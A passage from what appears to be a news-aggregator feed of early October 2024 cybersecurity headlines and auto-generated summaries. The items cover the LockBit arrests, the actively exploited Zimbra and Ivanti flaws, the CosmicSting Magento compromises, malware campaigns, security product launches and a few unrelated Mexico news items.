        Malwarebytes Browser Guard now warns users about recent data breaches, as well as automatically opting users out of tracking cookies. "

        Autosummary: And it’s precisely this data that advertisers want, as it helps them micro-target their ads to, say, new dads in Overland Park, Kansas, looking for a lawnmower, or, first-time homeowners in San Francisco needing a washer and dryer that fit in a small space. "


        Tick tock.. Operation Cronos arrests more LockBit ransomware gang suspects

        exploits ransomware
        2024-10-03 https://www.tripwire.com/state-of-security/tick-tock-operation-cronos-arrests-more-lockbit-ransomware-gang-suspects
        International law enforcement continues to dismantle the LockBit ransomware gang’s infrastructure. Read more in my article on the Tripwire State of Security blog. "

        Autosummary: Australia, the UK, and the United States have additionally implemented sanctions against an individual that the NCA believes to be a highly active affiliate of LockBit (and who they also suspect of being strongly linked to another cybercrime group, Evil Corp.) 31-year-old Aleksandr Ryzhenkov, believed to reside in Russia, is wanted for his alleged involvement in a series of ransomware attacks and money laundering activities. "


        Critical Ivanti Endpoint Manager flaw exploited (CVE-2024-29824)

        exploits
        2024-10-03 https://www.helpnetsecurity.com/2024/10/03/cve-2024-29824/

        CVE-2024-29824, an unauthenticated SQL Injection vulnerability in Ivanti Endpoint Manager (EPM) appliances, is being exploited by attackers, the Cybersecurity and Infrastructure Security Agency has confirmed by adding the bug to its Known Exploited Vulnerabilities catalog. Ivanti did the same by updating the relevant security advisory to say that they are aware of a limited number of customers who have been exploited. Further details about the attacks are unavailable at this time. About CVE-2024-29824 CVE-2024-29824, reported … More

        "

        Autosummary: "


        Malwarebytes Browser Guard updates block unwanted and unsafe content

        exploits
        2024-10-03 https://www.helpnetsecurity.com/2024/10/03/malwarebytes-browser-guard/

        Malwarebytes released new features for Browser Guard, its free browser extension for Chrome, Edge, Firefox, and Safari that blocks content identified as potentially unwanted and unsafe. Users will now receive a pop-up alert if a website was involved in a recent breach, offering the ability to click and scan their digital footprint to evaluate if private information was exposed. New Auto-Cookie Block empowers users to manage their privacy with ease by preventing the collection of … More

        "

        Autosummary: "


        New Perfctl Malware Targets Linux Servers for Cryptocurrency Mining and Proxyjacking

        exploits Linux
        2024-10-03 https://thehackernews.com/2024/10/new-perfctl-malware-targets-linux.html
        Linux servers are the target of an ongoing campaign that delivers a stealthy malware dubbed perfctl with the primary aim of running a cryptocurrency miner and proxyjacking software. "Perfctl is particularly elusive and persistent, employing several sophisticated techniques," Aqua security researchers Assaf Morag and Idan Revivo said in a report shared with The Hacker News. "When a new user logs "

        Autosummary: "


        Thousands of Adobe Commerce e-stores hacked by exploiting the CosmicSting bug

        exploits industry
        2024-10-03 https://securityaffairs.com/169316/cyber-crime/4000-unpatched-adobe-commerce-and-magento-stores-hacked.html
        Over 4,000 unpatched Adobe Commerce and Magento stores have been compromised by exploiting critical vulnerability CVE-2024-34102. Sansec researchers reported that multiple threat actors have exploited a critical Adobe Commerce vulnerability, tracked as CVE-2024-34102 (aka CosmicSting, CVSS score of 9.8), to compromise more than 4,000 e-stores over the past three months. The flaw is an Improper Restriction […] "

        Autosummary: Threat groups exploiting this vulnerability include Bobry, Polyovki (infecting over 650 stores), Surki, Burunduki, Ondatry, Khomyaki, and Belki. Sansec researchers reported that multiple threat actors have exploited a critical Adobe Commerce vulnerability, tracked as CVE-2024-34102 (aka CosmicSting, CVSS score of 9.8), to compromise more than 4,000 e-stores over the past three months. "


        APT and financial attacks on industrial organizations in Q2 2024

        financial
        2024-10-03 https://ics-cert.kaspersky.com/publications/apt-and-financial-attacks-on-industrial-organizations-in-q2-2024/
        This summary provides an overview of the reports of APT and financial attacks on industrial enterprises that were disclosed in Q2 2024, as well as the related activities of groups that have been observed attacking industrial organizations and critical infrastructure facilities. "

        Autosummary: The dropped stealer collects Telegram messenger configuration files, files with various extensions and from external media, data from browsers (Chrome, Opera, Yandex, Brave, Edge, etc.), as well as PowerShell usage logs and FileZilla and SSH configurations. Based on the accounts used to register Atera Agent and analyzed emails, researchers believe MuddyWater targeted the following types of organizations between October 2023 and April 2024: airlines, IT, telecommunications and pharmaceutical companies, automotive manufacturers, logistics companies, travel and tourism agencies, employment/immigration services, as well as small businesses. Hellhounds attacks: Researchers at Positive Technologies have reported a continuation of attacks against Russian companies by the Hellhounds threat actor, with at least 48 companies attacked, including public sector, IT, aerospace, energy, transportation and logistics, and mining companies. Transparent Tribe attacks: According to BlackBerry researchers, the threat actor Transparent Tribe (aka APT36, ProjectM, Mythic Leopard, Earth Karkaddan) is responsible for attacks carried out between late 2023 and April 2024 that targeted the Indian government, defense and aerospace sectors using cross-platform malware written in Python, Golang and Rust. The threat actor has targeted organizations in the government, telecoms, technology, aerospace, defense and utilities sectors in North America, Southeast Asia and Oceania, with other targets in Europe, Africa and elsewhere in Asia. The group also targeted organizations in Hong Kong, Malaysia, Laos, South Korea, the USA, Djibouti, Kenya, and Rwanda. Mustang Panda attacks: In the first quarter of 2024, ESET researchers identified the presence of Chinese-language APT Mustang Panda (aka Stately Taurus, Bronze President, Earth Preta, HoneyMyte, Camaro Dragon, RedDelta). Since March 2024, Sapphire Werewolf has conducted more than 300 attacks against Russian organizations in the education, industrial, IT, military-industrial complex and aerospace sectors using the Amethyst stealer, which is based on the open-source program called SapphireStealer. Researchers associate Shedding Zmiy with the Cobalt ((ex)Cobalt) group, known since 2016, which, according to public reports, exclusively attacked credit and financial organizations, pursuing only material gain. RedJuliett attacks: From November 2023 to April 2024, Insikt Group researchers identified cyber-espionage activities by RedJuliett targeting government, academic, technology (especially electronics), and diplomatic organizations in Taiwan. Moonstone Sleet attacks: A new threat actor, dubbed Moonstone Sleet by Microsoft researchers (formerly tracked as Storm-1789), has been targeting individuals and organizations in the software, IT, education and defense industrial base sectors using social engineering tactics. SmallTiger malware attacks: The AhnLab Security Intelligence Center (ASEC) discovered cases where a downloader named SmallTiger was used to attack South Korean businesses, including defense contractors, automotive parts manufacturers, and semiconductor manufacturers, among other confirmed targets. "


        Dutch Police: ‘State actor’ likely behind recent data breach

        financial government
        2024-10-03 https://www.bleepingcomputer.com/news/security/dutch-police-state-actor-likely-behind-recent-data-breach/
        The national Dutch police (Politie) says that a state actor was likely behind the data breach it detected last week. [...] "

        Autosummary: "


        Microsoft and DOJ disrupt Russian FSB hackers" attack infrastructure

        rusia-ucrania
        2024-10-03 https://www.bleepingcomputer.com/news/security/microsoft-and-doj-seize-spear-phishing-domains-used-by-star-blizzard-russian-hackers/
        Microsoft and the Justice Department have seized over 100 domains used by the Russian ColdRiver hacking group to target United States government employees and nonprofit organizations from Russia and worldwide in spear-phishing attacks. [...] "

        Autosummary: "


        Over 4,000 Adobe Commerce, Magento shops hacked in CosmicSting attacks

        industry
        2024-10-03 https://www.bleepingcomputer.com/news/security/over-4-000-adobe-commerce-magento-shops-hacked-in-cosmicsting-attacks/
        Approximately 5% of all Adobe Commerce and Magento online stores, or 4,275 in absolute numbers, have been hacked in "CosmicSting" attacks. [...] "

        Autosummary: Website administrators are strongly advised to move to the following versions (or later) as soon as possible: Adobe Commerce 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9; Adobe Commerce Extended Support 2.4.3-ext-8, 2.4.2-ext-8, 2.4.1-ext-8, 2.4.0-ext-8, 2.3.7-p4-ext-8; Magento Open Source 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9; Adobe Commerce Webhooks Plugin version 1.5.0. Sansec has provided a tool to check if their site is vulnerable and an "emergency hotfix" has been released to block most CosmicSting attacks, with both available here. "


        Fraudsters imprisoned for scamming Apple out of 6,000 iPhones

        financial
        2024-10-03 https://www.bleepingcomputer.com/news/security/fraudsters-imprisoned-for-scamming-apple-out-of-6-000-iphones/
        Two Chinese nationals were sentenced to prison for scamming Apple out of more than $2.5 million after exchanging over 6,000 counterfeit iPhones for authentic ones. [...] "

        Autosummary: "


        Google Adds New Pixel Security Features to Block 2G Exploits and Baseband Attacks

        exploits
        2024-10-03 https://thehackernews.com/2024/10/android-14-adds-new-security-features.html
        Google has revealed the various security guardrails that have been incorporated into its latest Pixel devices to counter the rising threat posed by baseband security attacks. The cellular baseband (i.e., modem) refers to a processor on the device that’s responsible for handling all connectivity, such as LTE, 4G, and 5G, with a mobile phone cell tower or base station over a radio interface. "This "

        Autosummary: The cellular baseband (i.e., modem) refers to a processor on the device that’s responsible for handling all connectivity, such as LTE, 4G, and 5G, with a mobile phone cell tower or base station over a radio interface. "


        Dutch police breached by a state actor

        government
        2024-10-03 https://securityaffairs.com/169328/hacking/dutch-police-breached-by-state-actor.html
        The Dutch government blames a “state actor” for hacking a police system, exposing the contact details of all police officers, according to the justice minister. The Dutch police blame a state actor for the recent data breach that exposed officers’ contact details, the justice minister told lawmakers. The incident took place on September 26, 2024, […] "

        Autosummary: Dutch police breached by a state actor (Pierluigi Paganini, October 03, 2024). The Dutch government blames a “state actor” for hacking a police system, exposing the contact details of all police officers, according to the justice minister. "


        Cybersecurity hiring slows, pros’ stress levels rise

        ciber
        2024-10-02 https://www.helpnetsecurity.com/2024/10/02/cybersecurity-professionals-stress-levels-grow/

        66% of cybersecurity professionals say their role is more stressful now than it was five years ago, according to ISACA. Major contributors to rising stress levels among cybersecurity professionals: according to the data, the top reasons for increased stress among cybersecurity professionals are an increasingly complex threat landscape (81%), low budget (45%), worsening hiring/retention challenges (45%), insufficiently trained staff (45%), and lack of prioritization of cybersecurity risks (34%). In line with this sentiment around challenging threats, … More

        "

        Autosummary: Major contributors to rising stress levels among cybersecurity professionals: according to the data, the top reasons for increased stress among cybersecurity professionals are an increasingly complex threat landscape (81%), low budget (45%), worsening hiring/retention challenges (45%), insufficiently trained staff (45%), and lack of prioritization of cybersecurity risks (34%). "


        Cybersecurity jobs available right now: October 2, 2024

        ciber
        2024-10-02 https://www.helpnetsecurity.com/2024/10/02/cybersecurity-jobs-available-right-now-october-2-2024/

        Applied Cybersecurity Engineer (Center for Securing the Homeland) MITRE | USA | Hybrid – View job details As an Applied Cybersecurity Engineer (Center for Securing the Homeland), you will apply interdisciplinary competencies in secure systems architecture and design, security operations, threat actor behavior, risk assessment, and network security to address business and operational challenges, including those related to technical IT and OT systems as well as military and government operations. You will define requirements, develop … More

        "

        Autosummary: Director Trust, Data Privacy – Roku | United Kingdom | On-site – View job details: As a Director Trust, Data Privacy, you will monitor and ensure compliance with regional (GDPR, ePrivacy, CCPA, CPRA, LGPD etc.) privacy requirements across Roku’s engineering organizations. Applied Cybersecurity Engineer (Center for Securing the Homeland) – MITRE | USA | Hybrid – View job details: As an Applied Cybersecurity Engineer (Center for Securing the Homeland), you will apply interdisciplinary competencies in secure systems architecture and design, security operations, threat actor behavior, risk assessment, and network security to address business and operational challenges, including those related to technical IT and OT systems as well as military and government operations. Incident Response and Forensics Officer – UnionBank of the Philippines | Philippines | On-site – View job details: As an Incident Response and Forensics Officer, you will assist in the detection, analysis, and response to security incidents, including malware infections, unauthorized access attempts, and data breaches. Tech Lead for Cyber Defense Operation Center – Stellantis | France | On-site – View job details: As a Tech Lead for Cyber Defense Operation Center, you will be responsible for designing, implementing, and maintaining the CDOC architecture, tools, and workflows, as well as leading a team of security analysts and engineers. Senior Cyber Security Engineer – CommScope | USA | Remote – View job details: As a Senior Cyber Security Engineer, you will design, implement, maintain, monitor, and manage cyber security systems and controls. "


        Researchers Sound Alarm on Active Attacks Exploiting Critical Zimbra Postjournal Flaw

        exploits
        2024-10-02 https://thehackernews.com/2024/10/researchers-sound-alarm-on-active.html
        Cybersecurity researchers are warning about active exploitation attempts targeting a newly disclosed security flaw in Synacor’s Zimbra Collaboration. Enterprise security firm Proofpoint said it began observing the activity starting September 28, 2024. The attacks seek to exploit CVE-2024-45519, a severe security flaw in its postjournal service that could enable unauthenticated attackers to "

        Autosummary: "While the postjournal feature may be optional or not enabled on most systems, it is still necessary to apply the provided patch to prevent potential exploitation," Ashish Kataria, a security architect engineer at Synacor, noted in a comment on September 19, 2024. "


        Police arrested four new individuals linked to the LockBit ransomware operation

        exploits ransomware
        2024-10-02 https://securityaffairs.com/169225/cyber-crime/new-arrests-linked-to-lockbit-ransomware-group.html
        An international police operation led to the arrest of four individuals linked to the LockBit ransomware group, including a developer. Europol, the UK, and the US law enforcement authorities announced a new operation against the LockBit ransomware gang. The police arrested an alleged LockBit developer at France’s request while vacationing outside Russia and two individuals […] "

        Autosummary: Police arrested four new individuals linked to the LockBit ransomware operation (Pierluigi Paganini, October 02, 2024). An international police operation led to the arrest of four individuals linked to the LockBit ransomware group, including a developer. "


        Critical Zimbra RCE vulnerability under mass exploitation (CVE-2024-45519)

        exploits
        2024-10-02 https://www.helpnetsecurity.com/2024/10/02/cve-2024-45519-exploited/

        Attackers are actively exploiting CVE-2024-45519, a critical Zimbra vulnerability that allows them to execute arbitrary commands on vulnerable installations. Proofpoint’s threat researchers say that the attacks started on September 28 – several weeks after Zimbra developers released patches for CVE-2024-45519 and other flaws, and a day after ProjectDiscovery’s analysts published a detailed technical write-up about the vulnerability and a PoC exploit to demonstrate the potential for local exploitation. Other researchers have published PoCs on GitHub … More

        "

        Autosummary: About CVE-2024-45519 Zimbra Collaboration (by Synacor) is a widely used cloud-hosted collaboration software and email platform, with an email server and a web client component (for document sharing, chat, and videoconferencing). "


        4 new LockBit-related arrests, identities of suspected Evil Corp members, affiliates revealed

        ransomware
        2024-10-02 https://www.helpnetsecurity.com/2024/10/02/lockbit-evil-corp-arrests-sanctions/

        The third phase of Operation Cronos, which involved officers from the UK National Crime Agency (NCA), the FBI, Europol and other law enforcement agencies, has resulted in the arrest of four persons for allegedly participating in the LockBit ransomware-as-a-service operation in various roles. “A suspected developer of LockBit was arrested at the request of the French authorities, while the British authorities arrested two individuals for supporting the activity of a LockBit affiliate,” Europol announced on … More

        "

        Autosummary: "


        Balbix D3 accelerates vulnerability mitigation

        exploits
        2024-10-02 https://www.helpnetsecurity.com/2024/10/02/balbix-d3/

        Balbix unveiled Balbix D3, the latest version of its exposure management platform. Packed with AI innovations, Balbix D3 is designed to help cybersecurity teams mitigate critical exposures faster than ever before, protecting organizations against emerging threats before attackers can exploit them. AI-powered workflows to speed up risk burndown: At the core of Balbix D3 lies a deep focus on mobilizing organizations for rapid cyber risk reduction. Using AI, Balbix D3 enables security and IT teams … More

        "

        Autosummary: Unified exposure risk scoring across the ecosystem Balbix D3 introduces a unified risk score for both CVEs and non-CVEs, enabling organizations to prioritize exposures across their infrastructure, applications, and user environments using a consistent risk-based framework. "


        SAFE X equips CISOs with integrated data from all their existing cybersecurity products

        ciber
        2024-10-02 https://www.helpnetsecurity.com/2024/10/02/safe-security-safe-x/

        Safe Security launched SAFE X, a generative AI-powered mobile app for CISOs. SAFE X delivers CISOs real-time business impact insights into their cybersecurity posture, enabling better decision-making and risk prioritization. CISOs often invest millions of dollars in building their cyber stacks, yet they lack critical business impact insights to prioritize and protect their organization effectively. Instead, they are bogged down by a patchwork of manual reports and outdated dashboards that lack business context and offer … More

        "

        Autosummary: “Unlike traditional solutions, SAFE X offers CISOs a unified platform for daily, on-demand, access to critical cyber risk data, enabling them to make data-driven decisions to protect their business,” said Brandon Pinzon, former CSO of Argo Group. With the launch of SAFE X, CISOs can now prioritize and immediately act on cyber risks that have the greatest material impact on the business—whether financial, reputational, operational, or compliance-related. "


        Andariel Hacking Group Shifts Focus to Financial Attacks on U.S. Organizations

        financial
        2024-10-02 https://thehackernews.com/2024/10/andariel-hacker-group-shifts-focus-to.html
        Three different organizations in the U.S. were targeted in August 2024 by a North Korean state-sponsored threat actor called Andariel as part of a likely financially motivated attack. "While the attackers didn’t succeed in deploying ransomware on the networks of any of the organizations affected, it is likely that the attacks were financially motivated," Symantec, part of Broadcom, said in a "

        Autosummary: Some of the other programs used in the intrusions are Mimikatz, Sliver, Chisel, PuTTY, Plink, Snap2HTML, and FastReverseProxy (FRP), all of which are either open-sourced or publicly available. "


        Critical Zimbra RCE flaw exploited to backdoor servers using emails

        exploits
        2024-10-02 https://www.bleepingcomputer.com/news/security/critical-zimbra-rce-flaw-exploited-to-backdoor-servers-using-emails/
        Hackers are actively exploiting a recently disclosed RCE vulnerability in Zimbra email servers that can be triggered simply by sending specially crafted emails to the SMTP server. [...] "

        Autosummary: The researchers reverse-engineered Zimbra’s patch to find that the "popen" function, which receives user input, has been replaced with a new function named "execvp," which features an input sanitization mechanism. "


        Fake Job Applications Deliver Dangerous More_eggs Malware to HR Professionals

        exploits
        2024-10-02 https://thehackernews.com/2024/10/fake-job-applications-deliver-dangerous.html
        A spear-phishing email campaign has been observed targeting recruiters with a JavaScript backdoor called More_eggs, indicating persistent efforts to single out the sector under the guise of fake job applicant lures. "A sophisticated spear-phishing lure tricked a recruitment officer into downloading and executing a malicious file disguised as a resume, leading to a more_eggs backdoor infection," "

        Autosummary: More_eggs, sold as a malware-as-a-service (MaaS), is a malicious software that comes with capabilities to siphon credentials, including those related to online bank accounts, email accounts, and IT administrator accounts. "


        Alert: Adobe Commerce and Magento Stores Under Attack from CosmicSting Exploit

        exploits industry
        2024-10-02 https://thehackernews.com/2024/10/alert-adobe-commerce-and-magento-stores.html
        Cybersecurity researchers have disclosed that 5% of all Adobe Commerce and Magento stores have been hacked by malicious actors by exploiting a security vulnerability dubbed CosmicSting. Tracked as CVE-2024-34102 (CVSS score: 9.8), the critical flaw relates to an improper restriction of XML external entity reference (XXE) vulnerability that could result in remote code execution. The shortcoming, "

        Autosummary: "


        5 Must-Have Tools for Effective Dynamic Malware Analysis

        exploits
        2024-10-02 https://thehackernews.com/2024/10/5-must-have-tools-for-effective-dynamic.html
        Dynamic malware analysis is a key part of any threat investigation. It involves executing a sample of a malicious program in the isolated environment of a malware sandbox to monitor its behavior and gather actionable indicators. Effective analysis must be fast, in-depth, and precise. These five tools will help you achieve it with ease. 1. Interactivity Having the ability to interact with the "

        Autosummary: As part of each analysis session in ANY.RUN, you get a comprehensive IOC report. In ANY.RUN, you can quickly gather a variety of indicators, including file hashes, malicious URLs, C2 connections, DNS requests, and more. Analysis of HTTP requests, connections, and DNS requests can provide insights into the malware’s communication with external servers, the type of data being exchanged, and any malicious activities. You can manually enter a password to open protected archives in ANY.RUN. After launching the executable file found inside the archive, the sandbox instantly detects that the system has been infected with AsyncRAT, a popular malware family used by attackers to remotely control victims’ machines and steal sensitive data. "


        Critical Zimbra Postjournal flaw CVE-2024-45519 actively exploited in the wild. Patch it now!

        exploits
        2024-10-02 https://securityaffairs.com/169239/hacking/zimbra-postjournal-flaw-cve-2024-45519-exploited.html
        Threat actors attempt to exploit recently disclosed vulnerability CVE-2024-45519 in Synacor’s Zimbra Collaboration. Proofpoint cybersecurity researchers reported that threat actors are attempting to exploit a recently disclosed vulnerability, tracked as CVE-2024-45519, in Synacor’s Zimbra Collaboration. Starting on September 28, 2024, threat actors have been attempting to exploit the issue to achieve remote code execution on […] "

        Autosummary: The emails spoofing Gmail were sent to bogus addresses in the CC fields in an attempt for Zimbra servers to parse and execute… https://t.co/VmnQkDypkg pic.twitter.com/RJr9jawwWl — Threat Insight (@threatinsight) October 1, 2024 “Beginning on September 28, @Proofpoint began observing attempts to exploit CVE-2024-45519, a remote code execution vulnerability in Zimbra mail servers. "


        Mexico’s first female president vows "it’s time for women"

        latam
        2024-10-02 https://www.bbc.com/news/articles/ce3z263453lo
        At her inauguration, the first female president of Mexico promises to focus on improving health and education. "

        Autosummary: Reuters There were cheers inside Congress, where the governing party has a majority She began her first speech as president by thanking her political mentor and predecessor in the top job, Andrés Manuel López Obrador, calling him “the most important political leader and social warrior in Mexico’s modern history". "


        US election: The view from Mexico

        latam
        2024-10-02 https://www.bbc.com/news/videos/cje3de25nn9o
        BBC Monitoring’s Luis Fajardo looks at how the Mexican media has been reporting on US elections. "

        Autosummary: "


        Critical Ivanti RCE flaw with public exploit now used in attacks

        exploits
        2024-10-02 https://www.bleepingcomputer.com/news/security/critical-ivanti-rce-flaw-with-public-exploit-now-used-in-attacks/
        CISA warned today that a critical Ivanti vulnerability that can let threat actors gain remote code execution on vulnerable Endpoint Manager (EPM) appliances is now actively exploited in attacks. [...] "

        Autosummary: "


        Fake browser updates spread updated WarmCookie malware

        exploits
        2024-10-02 https://www.bleepingcomputer.com/news/security/fake-browser-updates-spread-updated-warmcookie-malware/
        A new "FakeUpdate" campaign targeting users in France leverages compromised websites to show fake browser and application updates that spread a new version of the WarmCookie malware. [...] "

        Autosummary: FakeUpdate is a cyberattack strategy used by a threat group known as "SocGholish" who compromises or creates fake websites to show visitors fake update prompts for a variety of applications, such as web browsers, Java, VMware Workstation, WebEx, and Proton VPN. "


        FIN7 hackers launch deepfake nude “generator” sites to spread malware

        exploits
        2024-10-02 https://www.bleepingcomputer.com/news/security/fin7-hackers-launch-deepfake-nude-generator-sites-to-spread-malware/
        The notorious APT hacking group known as FIN7 launched a network of fake AI-powered deepnude generator sites to infect visitors with information-stealing malware. [...] "

        Autosummary: According to Silent Push, FIN7 directly operated sites like "aiNude[.]ai", "easynude[.]website", and "nude-ai[.]pro," which offered "free trials" or "free downloads," but in reality just spread malware. "


        U.S. CISA adds Ivanti Endpoint Manager (EPM) flaw to its Known Exploited Vulnerabilities catalog

        exploits
        2024-10-02 https://securityaffairs.com/169279/security/u-s-cisa-adds-ivanti-epm-flaw-known-exploited-vulnerabilities-catalog.html
        U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Endpoint Manager (EPM) vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the Ivanti Virtual Traffic Manager authentication bypass vulnerability CVE-2024-29824 (CVSS score of 9.6) to its Known Exploited Vulnerabilities (KEV) catalog. In May, Ivanti rolled out security patches to […] "

        Autosummary: "


        Free Sniper Dz Phishing Tools Fuel 140,000+ Cyber Attacks Targeting User Credentials

        financial
        2024-10-01 https://thehackernews.com/2024/10/free-sniper-dz-phishing-tools-fuel.html
        More than 140,000 phishing websites have been found linked to a phishing-as-a-service (PhaaS) platform named Sniper Dz over the past year, indicating that it’s being used by a large number of cybercriminals to conduct credential theft. "For prospective phishers, Sniper Dz offers an online admin panel with a catalog of phishing pages," Palo Alto Networks Unit 42 researchers Shehroze Farooqi, "

        Autosummary: A video uploaded to Vimeo in January 2021 shows that the service offers ready-to-use scam templates for various online sites like X, Facebook, Instagram, Skype, Yahoo, Netflix, Steam, Snapchat, and PayPal in English, Arabic, and French languages. "For prospective phishers, Sniper Dz offers an online admin panel with a catalog of phishing pages," Palo Alto Networks Unit 42 researchers Shehroze Farooqi, Howard Tong, and Alex Starov said in a technical report. "


        Halcyon offers ransomware protection for Linux environments

        exploits ransomware Linux
        2024-10-01 https://www.helpnetsecurity.com/2024/10/01/halcyon-linux/

        As an integral part of the Halcyon Anti-Ransomware Platform, Halcyon Linux offers protection against ransomware attacks targeting Linux systems. While ransomware operators were once almost exclusively focused on targeting Windows environments, the introduction of Linux variants represents a significant expansion of the addressable target range. In 2023, Linux-based ransomware attacks increased by 75% yet Linux-based systems and endpoints are often overlooked and without ransomware defenses. “When it comes to ransomware protection, organizations typically prioritize securing … More

        The post Halcyon offers ransomware protection for Linux environments appeared first on Help Net Security.

        "

        Autosummary: "


        Veeam Recon Scanner identifies adversary tactics, techniques, and procedures

        industry
        2024-10-01 https://www.helpnetsecurity.com/2024/10/01/veeam-recon-scanner/

        Veeam Software announced the addition of new Veeam Recon Scanner technology to Veeam Data Platform. This technology, developed by Coveware by Veeam, draws on years of experience in cyber-extortion incident response and the largest database of cyber incidents in the world. Veeam Recon Scanner is designed to proactively identify, triage, and prevent cyberattacks, revolutionizing threat assessment in the data protection market. “Protecting your organization from a cyber-attack requires a coordinated strategy. It starts at the … More

        The post Veeam Recon Scanner identifies adversary tactics, techniques, and procedures appeared first on Help Net Security.

        "

        Autosummary: “By collecting and analyzing data proactively, Recon Scanner identifies unexpected network connections, unusual user behavior, suspicious file activity, data exfiltration attempts, and even potential brute force attacks. "


        RSA and Swissbit join forces to secure government agencies

        government
        2024-10-01 https://www.helpnetsecurity.com/2024/10/01/rsa-swissbit-partnership/

        RSA and Swissbit announced that RSA will start introducing its next-generation hardware authenticators RSA iShield Key 2 series powered by Swissbit alongside RSA ID Plus for Government. Built to meet the highest security standards, the RSA iShield Key 2 and the RSA iShield Key 2 Pro feature FIDO2, PIV, HOTP support and a FIPS 140-3 certified smart chip and can provide the private sector and U.S. federal agencies, systems integrators, and government contractors with a … More

        The post RSA and Swissbit join forces to secure government agencies appeared first on Help Net Security.

        "

Autosummary: By aligning their efforts with international regulatory bodies, RSA and Swissbit will empower federal agencies and the private sector with secure, user-friendly authentication practices to achieve optimal Zero Trust Architecture (ZTA) with:
- Phishing-resistant multi-factor authentication (MFA), via the RSA DS100, RSA Authenticator App, and the RSA iShield Key 2 series, powered by Swissbit
- Identity governance and administration (IGA) and lifecycle capabilities, via RSA Governance & Lifecycle
- Machine learning-driven, contextual authentication, via RSA Risk AI
- A FedRAMP-authorized access and cloud service, via RSA ID Plus for Government
Provisioned, managed, and updated as part of a secure supply chain, the RSA iShield Key 2 series complies with stringent federal regulations and offers premium security capabilities for protecting sensitive data and critical infrastructure. "


        Use Windows event logs for ransomware investigations, JPCERT/CC advises

        exploits ransomware
        2024-10-01 https://www.helpnetsecurity.com/2024/10/01/windows-event-logs-ransomware-response/

        The JPCERT Coordination Center – the first Computer Security Incident Response Team established in Japan – has compiled a list of entries in Windows event logs that could help enterprise defenders respond to human-operated ransomware attacks and potentially limit the malware’s damage. “The difficult part of the initial response to a human-operated ransomware attack is identifying the attack vector,” the organization pointed out. Detecting specific entries in Windows event logs – Application, Security, System, Setup … More

        The post Use Windows event logs for ransomware investigations, JPCERT/CC advises appeared first on Help Net Security.

        "

        Autosummary: "


        News agency AFP hit by cyberattack, client services impacted

        ciber
        2024-10-01 https://securityaffairs.com/169175/hacking/news-agency-afp-hit-by-cyberattack-client-services-impacted.html
        AFP suffered a cyberattack affecting its IT systems and content delivery for partners, the incident impacted some client services. Agence France-Presse (AFP) reported a cyberattack on Friday that impacted its IT systems and content delivery for partners. The media agency confirmed that the global news coverage remains unaffected, however some client services were impacted. AFP […] "

        Autosummary: It is responsible for collecting, verifying, cross-checking and disseminating information, in a neutral, factual form, intended to be used directly by all types of media (radio, television, written press, websites) and also to serve as a source and alert for large companies and administrations. "


        Ransomware attack forces UMC Health System to divert some patients

        exploits
        2024-10-01 https://www.bleepingcomputer.com/news/security/ransomware-attack-forces-umc-health-system-to-divert-some-patients/
        Texas healthcare provider UMC Health System was forced to divert some patients to other locations after a ransomware attack impacted its operations. [...] "

        Autosummary: Ransomware attacks are typically accompanied by data theft, and in this case, the sensitive medical information of hundreds of thousands could be impacted. "


        Evil Corp hit with new sanctions, BitPaymer ransomware charges

        exploits ransomware
        2024-10-01 https://www.bleepingcomputer.com/news/security/evil-corp-hit-with-new-sanctions-bitpaymer-ransomware-charges/
        The Evil Corp cybercrime syndicate has been hit with new sanctions by the United States, United Kingdom, and Australia. The US also indicted one of its members for conducting BitPaymer ransomware attacks. [...] "

Autosummary: "Eduard Benderskiy (Benderskiy), a former Spetsnaz officer of the Russian Federal Security Service (FSB), which is designated under numerous OFAC sanctions authorities, current Russian businessman, and the father-in-law of Evil Corp's leader Maksim Viktorovich Yakubets (Maksim), has been a key enabler of Evil Corp's relationship with the Russian state," alleges the U.S. Department of the Treasury announcement. The sanctioned individuals are Eduard Benderskiy (Maksim's father-in-law), Viktor Grigoryevich Yakubets (Maksim's father), Aleksandr Viktorovich Ryzhenkov, Sergey Viktorovich Ryzhenkov, Aleksey Yevgenevich Shchetinin, Beyat Enverovich Ramazanov, and Vadim Gennadievich Pogodin. "


        Police arrest four suspects linked to LockBit ransomware gang

        exploits ransomware
        2024-10-01 https://www.bleepingcomputer.com/news/security/police-arrest-four-suspects-linked-to-lockbit-ransomware-gang/
        Law enforcement authorities from 12 countries arrested four suspects linked to the LockBit ransomware gang, including a developer, a bulletproof hosting service administrator, and two people connected to LockBit activity. [...] "

        Autosummary: ​Additional LockBit arrests and charges LockBit emerged in September 2019 and has since claimed responsibility for and been linked to attacks against many high-profile companies and organizations worldwide, including Bank of America, Boeing, the Continental automotive giant, the Italian Internal Revenue Service, and the UK Royal Mail. "


        UMC Health System diverted patients following a ransomware attack

        exploits ransomware
        2024-10-01 https://securityaffairs.com/169198/cyber-crime/umc-health-system-cyberattack.html
        US healthcare provider UMC Health System had to divert patients due to a network outage caused by a ransomware attack. On September 27, 2024, US healthcare provider UMC Health System announced an investigation into an IT outage across its network. UMC diverted patients for several days after taking IT systems offline following a ransomware attack. […] "

Autosummary: It’s unclear if threat actors exfiltrated patients’ data during the attack. Healthcare infrastructure in the US continues to be under attack; in July, the LockBit ransomware gang breached the Fairfield Memorial Hospital in Illinois. "


        U.S. CISA adds D-Link DIR-820 Router, DrayTek Multiple Vigor Router, Motion Spell GPAC, SAP Commerce Cloud bugs to its Known Exploited Vulnerabilities catalog

        exploits
        2024-10-01 https://securityaffairs.com/169189/hacking/u-s-cisa-adds-d-link-dir-820-router-draytek-multiple-vigor-router-motion-spell-gpac-sap-commerce-cloud-bugs-to-its-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds D-Link DIR-820 Router, DrayTek Multiple Vigor Router, Motion Spell GPAC, SAP Commerce Cloud bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added vulnerabilities in D-Link DIR-820 routers, multiple DrayTek Vigor routers, Motion Spell GPAC, and SAP Commerce Cloud to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these […] "

        Autosummary: "


        Arc browser launches bug bounty program after fixing RCE bug

        exploits
        2024-10-01 https://www.bleepingcomputer.com/news/security/arc-browser-launches-bug-bounty-program-after-fixing-rce-bug/
